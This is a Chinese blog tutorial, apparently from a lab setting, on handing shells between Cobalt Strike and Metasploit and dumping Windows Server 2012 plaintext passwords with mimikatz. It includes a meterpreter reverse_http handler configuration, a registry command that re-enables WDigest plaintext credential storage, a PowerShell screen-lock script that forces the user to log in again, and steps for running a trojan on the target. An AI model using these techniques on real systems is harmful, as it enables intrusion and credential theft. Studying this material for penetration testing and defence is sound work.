cs与msf权限传递,以及mimikatz抓取win2012明文密码

最新推荐文章于 2024-06-28 14:05:31 发布
最新推荐文章于 2024-06-28 14:05:31 发布
阅读量812 收藏 29
点赞数 23
文章标签: 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_65785894/article/details/139198406
版权

目录

解释参数

foreign http

foreign https

cs与msf权限传递

Cobalt Strike会话传递到Metasploit Framework

Cobalt strike上的操作

​编辑​编辑​编辑

Metasploit Framework上的操作

传递会话

Metasploit Framework会话传递到Cobalt Strike

Cobalt strike上的操作

Metasploit Framework上的操作

传递会话

mimikatz获取win2012 明文密码

Cobalt strike上的操作

Metasploit Framework上的操作

解释参数

foreign http

将目标权限通过http的方式外派给metasploit或empire

通俗易懂 就是用来cs 传递shell 的(http)

foreign https

将目标权限通过https的方式外派给metasploit或empire

通俗易懂 就是用来cs 传递shell 的(https)

cs与msf权限传递

Cobalt Strike会话传递到Metasploit Framework

Cobalt strike上的操作

1、进入cs界面,首先来到 Cobalt Strike 目录下,启动 Cobalt Strike 服务端(我的cs在这个目录下)

2、用客户端进

3、建立监听

4、生成脚本文件

5、开启服务,让win_2012 下载木马文件并运行

6、显示已经获取到了win的权限

Metasploit Framework上的操作

8、进去msf msfconsole

9、在 Metasploit Framework 上调用 handler 模块

use explpit/multi/handler

10、监听

set payload windows/meterpreter/reverse_http
set lhost 192.168.111.141 
set lport 4444
run

传递会话

11、在 Cobalt strike上先创建一个 Foreign HTTP 监听(注意必须得跟msf设置的端口一致)

11、之后在 Cobalt strike 上右击待传递的会话选择 Spawn ,选择刚刚创建的 Foreign HTTP 监听

12、传参完毕

Metasploit Framework会话传递到Cobalt Strike

Cobalt strike上的操作

1、这里选择的是 HTTPS Beacon,添加上主机IP,点击保存,即可创建一个 HTTPS Beacon

Metasploit Framework上的操作

(mimikatz 抓明文密码 1,2 步以详细说明)

传递会话

1、退回 handler 目录下(background)

2、进入inject 敲以下命令(session 1 必须跟 background 之后那个session 得保持一致)

3、查看cs的权限(已经传递)

mimikatz获取win2012 明文密码

Cobalt strike上的操作

1、先抓一次密码(发现是密码是null)

2、可以通过修改注册表来让Wdigest Auth保存明文口令:reg add "HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest" /v UseLogonCredential /t REG_DWORD /d 1 /f

3、修改注册表之后,需要用户重新登录才可以生效(把如下代码保存为lock-screen.ps1)

Function Lock-WorkStation {

$signature = @"

[DllImport("user32.dll", SetLastError = true)]

public static extern bool LockWorkStation();

"@

$LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru

$LockWorkStation::LockWorkStation() | Out-Null

}

Lock-WorkStation

4、用win 下载 生成的文件(并运行)

5、重新输入密码就可以获取明文密码

Metasploit Framework上的操作

1、生成木马文件(我之前生成过)


2、用msf监听

3、获取明文密码 

kail 开启下载

win 下载(四个全下载,运行程序)

返回kail端(execute -i -f mimikatz.exe 进入mimikatz)

查看权限(必须为system才可以查到)

pheromone360
关注
  • 23
    点赞
  • 29
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
csmsf权限传递以及mimikatz抓取win2012明文密码
huizhaohaha的博客
05-25 767
我查找过资料得出,Cobalt Strike 的前身是 Armitage,而 Armitage 又可以理解为 Metasploit Framework 的图形界面版,因此 Cobalt Strike 与 Metasploit Framework 在很多地方都是兼容的,所以我们便可以将 Metasploit Framework 攻击产生的会话传递到 Cobalt Strike 上,同样的 Cobalt Strike 的会话也能够传递到 Metasploit Framework。
csmsf权限传递mimikatz抓取win2012明文密码
qq_64951792的博客
06-27 621
cobaltstrike,msf
E004-渗透测试常用工具-使用MSF实现Web传递获取靶机权限.pdf
12-02
本课程重点讲解了如何利用Metasploit(MSF)框架进行渗透测试,通过Web传递的方式获取靶机权限。以下是详细的知识点解析: 1. **Metasploit框架**:Metasploit是一款开源的安全漏洞检测工具,它包含了大量的漏洞...
通信与网络中的MSF基于组件的业务框架
11-14
MSF定义的基于组件的业务框架如图所示。该框架包括业务组件和业务代理两大主要功能。业务组件是捆绑或集成在一起的多个业务对象,用来创建销售给用户的业务,有三种类型的业务组件。  图 MSF基于组件的业务框架 ...
基础电子中的MSF业务框架与IMS的关系
11-14
MSF和36PP对于在下一代网络中快速有效地进行新业务开发的需求认识是一致的,因此,MSF的业务框架和36PP IMS的业务平台之间必然存在着紧密的关系。通过对MSF业务框架和IMS业务平台的分析,可以看出MSF中的业务代理...
Msf攻击Win7
07-09
Msf攻击Win7 metasploit
通信与网络中的MSF250的DS1/E1信号格式
12-10
摘要:MSF250是一个多业务成帧芯片。它带有DS1/E1接口,可将28个DS1或21个E1信号以位异步方式映射/解映射到VT.5/TU2路径中。文章从各种不同的帧格式和成帧原理论述了MSF250在DS1/E1映射/解映射中的...
將IP地址改成自動獲取的詳細步驟
最新发布
ecommerce_Amazon的博客
06-28 443
將IP地址改成自動獲取的詳細步驟。
国际网络专线怎么开通?
lxzn123的博客
06-25 359
一个优秀的服务商,应具备广泛的全球网络覆盖能力,能根据企业的具体需求,提供定制化的网络解决方案。在全球化日益加速的今天,企业越来越需要稳定、高效的网络来支撑他们的跨国业务。同时,选择一个负责任的服务商,将确保网络专线的长期稳定运行,为企业的国际化发展提供强有力的网络支撑。这一阶段,服务商会确定最佳的网络路径,配置合适的网络设备,确保数据在跨国传输过程中的稳定性和安全性。一个优秀的服务商,不仅技术团队专业实力强,还要能够提供7*24小时的快速响应,让企业在享受高质量网络服务的同时,也能获得全方位的售后支持。
Qt | QSS自定义部件的外观
m0_45463480的博客
06-24 227
Qt | QSS自定义部件的外观
串口小工具(来源网络,源码修改)
HongDaYu的搬砖之路
06-25 261
CSDN 中的一位博主的分享做了一些修改。QtSerial 的配和更稳定些。
Python爬虫使用的IP协议主要是什么
qq_42992840的博客
06-26 421
TCP/IP不是一个协议,而是一个协议族的统称,里面包括了IP协议、TCP协议、UDP协议等。在Python爬虫中,主要使用的是TCP/IP协议族中的HTTP协议和HTTPS协议,这两个协议都是基于TCP/IP的。除了HTTP和HTTPS协议外,Python爬虫还可能会使用到其他基于TCP/IP的协议,如FTP(文件传输协议)用于文件下载,SMTP(简单邮件传输协议)用于发送邮件等。总的来说,Python爬虫主要使用的IP协议是TCP/IP协议族中的HTTP和HTTPS协议。
10_网络规划和管理
qq_45937810的博客
06-27 1124
本文主要介绍了嵌入式领域中网络规划和管理的相关知识点。
Unity udp通信详解
u014196765的博客
06-27 1024
在Unity中实现UDP通信,需要使用C#的System.Net和System.Net.Sockets命名空间。UDP(用户数据报协议)是一种无连接的网络协议,它允许数据包在网络上发送和接收,但不保证数据包的到达顺序、完整性或可靠性。这使得UDP非常适合那些对实时性要求高的应用,如在线游戏和实时通信。首先,你需要创建一个UDP客户端来发送和接收数据。你可以使用UdpClient.Send方法来发送数据。接收数据稍微复杂一些,因为你通常需要在一个单独的线程或协程中进行监听,以避免阻塞主线程。
当你在浏览器输入一个地址
侯仕奇的博客
06-24 1339
你在浏览器中输出了一个地址,回车后,一直到显示页面,中间经历了哪些过程 ?
SAN交换机级联
Jian Sun_的博客
06-27 271
如果两台交换机上配置了zone,ISL级联时需要进行zone融合(zone merge),如果两台交换机zone不匹配,将造成zone冲突(zone conflict),解决zone冲突最直接方法是备份其中一台交换机的配置,然后清除该交换机的zone信息,再级联,具体方法如下。第三,ISL级联的交换机,应该有不同的Domain ID,正常情况下,级联后的SAN交换机会自动将Domain ID协商为不同值。第二,确保级联交换机上的端口使用相同类型的SFP模块,并且使用该模块支持的光纤线缆进行连接。
Linux 字符型设备 + platform总线 + sysfs设备模型
weixin_39223971的博客
06-24 857
原文链接:https://blog.csdn.net/dengjin20104042056/article/details/138501685。
msf如何安装带win
03-28
MSF中安装带win的模块,需要先下载或编写一个Windows Payload代码。然后在MSF中使用以下步骤进行安装: 1. 打开MSF控制台,在命令行中输入“use exploit/windows/”命令,然后按Tab键两次,以显示可用的Windows模块列表。 2. 选择要使用的模块,然后输入“info”命令以显示有关该模块的详细信息,包括配置选项和使用说明。 3. 配置模块选项,例如设置目标IP地址,端口号和Payload代码。 4. 输入“run”命令以启动模块,并等待连接。如果成功连接,则可以执行各种操作,例如文件传输,命令执行和系统访问等。 需要注意的是,使用MSF进行攻击是非法的,必须获得合法授权和许可才能进行测试和演示。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值